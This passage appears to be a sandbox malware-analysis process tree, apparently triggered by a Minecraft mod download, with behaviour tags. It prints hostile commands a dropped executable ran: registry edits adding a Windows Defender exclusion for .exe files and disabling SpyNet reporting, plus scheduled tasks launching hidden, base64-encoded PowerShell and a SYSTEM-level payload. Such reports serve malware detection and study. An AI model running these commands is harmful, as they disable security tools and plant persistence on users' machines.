C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 16404⤵
- Program crash
PID:3924
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 17444⤵
- Program crash
PID:5276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 13284⤵
- Program crash
PID:3536
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 17644⤵
- Program crash
PID:2444
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 19084⤵
- Program crash
PID:4448
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 21164⤵
- Program crash
PID:5704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://minecraft-inside.ru/download/316726/4⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5228 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb8a2946f8,0x7ffb8a294708,0x7ffb8a2947185⤵PID:1664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1964 /prefetch:25⤵PID:1216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:5264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:85⤵PID:6096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:15⤵PID:3896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:15⤵PID:1612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2608 /prefetch:15⤵PID:4276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:15⤵PID:4968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:15⤵PID:5280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:15⤵PID:2468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:15⤵PID:5792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3436 /prefetch:85⤵PID:3476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3436 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:3952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:15⤵PID:4612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:15⤵PID:5152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:15⤵PID:5692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:15⤵PID:3392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2008 /prefetch:85⤵PID:3884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1788 /prefetch:25⤵
- Suspicious behavior: EnumeratesProcesses
PID:4164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1952,6480448346560705684,3563535163963188687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6352 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:5556
-
-
C:\Program Files\Java\jre-1.8\bin\javaw.exe"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Downloads\hollow-1.0.0_1.jar"5⤵PID:5952
-
C:\Windows\system32\icacls.exeC:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M6⤵
- Modifies file permissions
PID:2932
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 18044⤵
- Program crash
PID:5180
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 18724⤵
- Program crash
PID:5100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 16404⤵
- Program crash
PID:6064
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 18644⤵
- Program crash
PID:1100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 18164⤵
- Program crash
PID:1176
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 18684⤵
- Program crash
PID:3044
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 19684⤵
- Program crash
PID:4296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 17884⤵
- Program crash
PID:2872
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 20804⤵
- Program crash
PID:4336
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 19404⤵
- Program crash
PID:5548
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 18964⤵
- Program crash
PID:4644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 17564⤵
- Program crash
PID:3488
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 18524⤵
- Program crash
PID:6076
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 20804⤵
- Program crash
PID:6036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 18604⤵
- Program crash
PID:4436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\EtKoJuZI\8Myq458QN8LWsBBIu.exe"4⤵PID:2168
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\EtKoJuZI\8Myq458QN8LWsBBIu.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4172
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\yaotKzPN\QlRCnaG.exe"4⤵PID:3716
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\yaotKzPN\QlRCnaG.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\JyfSzOIv\ELeogOLxsWe.exe"4⤵PID:5660
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\JyfSzOIv\ELeogOLxsWe.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\9HzfAQLe\EK0DL3mZ4.exe"4⤵PID:5360
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\9HzfAQLe\EK0DL3mZ4.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3116
-
-
-
C:\Users\Admin\AppData\Local\Temp\JyfSzOIv\ELeogOLxsWe.exeC:\Users\Admin\AppData\Local\Temp\JyfSzOIv\ELeogOLxsWe.exe /sid=3 /pid=10904⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4168
-
-
C:\Users\Admin\AppData\Local\Temp\EtKoJuZI\8Myq458QN8LWsBBIu.exeC:\Users\Admin\AppData\Local\Temp\EtKoJuZI\8Myq458QN8LWsBBIu.exe4⤵
- Executes dropped EXE
PID:5384 -
C:\Users\Admin\AppData\Local\Temp\is-177CR.tmp\8Myq458QN8LWsBBIu.tmp"C:\Users\Admin\AppData\Local\Temp\is-177CR.tmp\8Myq458QN8LWsBBIu.tmp" /SL5="$C0384,1872453,54272,C:\Users\Admin\AppData\Local\Temp\EtKoJuZI\8Myq458QN8LWsBBIu.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5808 -
C:\Users\Admin\AppData\Local\XML Edit Plus\xmleditplus.exe"C:\Users\Admin\AppData\Local\XML Edit Plus\xmleditplus.exe" -i6⤵
- Executes dropped EXE
PID:3540
-
-
C:\Users\Admin\AppData\Local\XML Edit Plus\xmleditplus.exe"C:\Users\Admin\AppData\Local\XML Edit Plus\xmleditplus.exe" -s6⤵
- Executes dropped EXE
PID:6044
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yaotKzPN\QlRCnaG.exeC:\Users\Admin\AppData\Local\Temp\yaotKzPN\QlRCnaG.exe --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:2992 -
C:\Users\Admin\AppData\Local\Temp\yaotKzPN\QlRCnaG.exeC:\Users\Admin\AppData\Local\Temp\yaotKzPN\QlRCnaG.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x72f221f8,0x72f22204,0x72f222105⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4900
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\QlRCnaG.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\QlRCnaG.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1228
-
-
C:\Users\Admin\AppData\Local\Temp\yaotKzPN\QlRCnaG.exe"C:\Users\Admin\AppData\Local\Temp\yaotKzPN\QlRCnaG.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2992 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240316062018" --session-guid=149d9bea-cc18-4a76-b9bb-488205a69c2b --server-tracking-blob=YjMxOWM1ZDMxNzYzY2Q1N2ZjZDA2YjI1YTYzZGI2YWRlMzQwYTE0YjJjMDMyYTk2N2U3MTRlYzhkY2ZmZWI1ODp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMDU2OTk2Ni42MjAxIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiI0MWY0M2I5Zi1hOTFkLTRlZDUtYjI2Mi0xNGI1YzFiNjU1YWMifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=A4050000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:6024 -
C:\Users\Admin\AppData\Local\Temp\yaotKzPN\QlRCnaG.exeC:\Users\Admin\AppData\Local\Temp\yaotKzPN\QlRCnaG.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x320,0x324,0x328,0x2f0,0x32c,0x717121f8,0x71712204,0x717122106⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2428
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403160620181\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403160620181\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"5⤵
- Executes dropped EXE
PID:636
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403160620181\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403160620181\assistant\assistant_installer.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4244 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403160620181\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403160620181\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x28c,0x290,0x294,0x268,0x298,0x11c0040,0x11c004c,0x11c00586⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5680
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9HzfAQLe\EK0DL3mZ4.exeC:\Users\Admin\AppData\Local\Temp\9HzfAQLe\EK0DL3mZ4.exe /did=757674 /S4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:4268 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵PID:1740
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵PID:764
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵PID:4484
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵PID:5480
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵PID:4004
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵PID:440
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵PID:3044
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵PID:2468
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "giTfATtvf" /SC once /ST 05:19:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
PID:5124
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "giTfATtvf"5⤵PID:2452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "giTfATtvf"5⤵PID:4876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bNhfIGhlWGwUbRxNhy" /SC once /ST 06:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\rHhrHuvAdxPPAxZoz\aGWnaFYBltXWMTT\lLqrbhs.exe\" Ut /iFsite_idTZi 757674 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5272
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 19684⤵
- Program crash
PID:3748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 18644⤵
- Program crash
PID:3792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 22124⤵
- Program crash
PID:4524
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 18644⤵
- Program crash
PID:5376
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 18804⤵
- Program crash
PID:2964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 21924⤵
- Program crash
PID:1740
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 21844⤵
- Program crash
PID:3864
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 21924⤵
- Program crash
PID:1612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 21684⤵
- Program crash
PID:672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 19364⤵
- Program crash
PID:2124
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 19644⤵
- Program crash
PID:2812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 20084⤵
- Program crash
PID:5548
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 21204⤵
- Program crash
PID:2788
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 19844⤵
- Program crash
PID:2860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 18604⤵
- Program crash
PID:4876
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 21764⤵
- Program crash
PID:5276
-
-
